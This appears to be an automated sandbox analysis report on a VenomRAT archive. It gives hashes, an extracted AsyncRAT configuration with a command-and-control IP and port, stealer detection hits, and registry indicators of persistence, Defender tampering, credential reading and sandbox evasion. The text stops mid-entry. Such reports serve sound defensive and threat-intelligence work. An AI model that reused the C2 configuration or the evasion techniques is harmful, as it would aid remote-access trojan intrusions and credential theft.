Resubmissions
01-11-2024 19:21
241101-x2x7rasncw 1001-11-2024 19:17
241101-xznwaswjej 1001-11-2024 02:08
241101-ckp5latpgs 10Analysis
-
max time kernel
546s -
max time network
551s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
01-11-2024 19:21
General
-
Target
VenomRAT.v6.0.3.+SOURCE.7z
-
Size
73.7MB
-
MD5
29c6c293c6723135cbe7b5d0fc3a3d20
-
SHA1
17219c8998c1afa1bd7061276958e9ed54cbb393
-
SHA256
46c17ffefbfcaa044cbbcbb33d6219da84538c22a51e53bff647c87da33a0bd9
-
SHA512
d6833432820b6eb2828ffd88a3028f3b3b014176db76330ce5c3af5eeb80aac1d9816d81dfdaa11a972e59ed144551d60c1cf4b0568e5cc7dedcb6df033c12e1
-
SSDEEP
1572864:4VI5gzIBQ4OZRbwhtq81vZ8KCNsuYk+8327i8Nd5Sr5:KIeIa4Atotq87BCyuz+BOKe5
Malware Config
Extracted
asyncrat
1.0.7
Default
95.216.52.21:7575
xdnqiaxygefjfoolgo
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
127.0.0.1:4449
lilmcgggegpnktrccy
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x001900000002ac10-2634.dat family_stormkitty behavioral1/memory/3228-2640-0x0000000006720000-0x0000000006842000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 7068 created 684 7068 powershell.exe 7 -
Async RAT payload 3 IoCs
resource yara_rule behavioral1/files/0x001900000002ac27-582.dat family_asyncrat behavioral1/files/0x001900000002ab96-583.dat family_asyncrat behavioral1/files/0x001900000002ac3a-606.dat family_asyncrat -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Executes dropped EXE 2 IoCs
pid Process 1808 Venom RAT + HVNC + Stealer + Grabber.exe 3228 Client.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 2144 powershell.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ipinfo.io 199 ipinfo.io -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3228 set thread context of 2304 3228 Client.exe 101 PID 3228 set thread context of 6092 3228 Client.exe 180 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3372 sc.exe 2956 sc.exe 6716 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchHost.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\GPU SearchHost.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" explorer.exe -
Modifies data under HKEY_USERS 48 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133749627493595794" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created 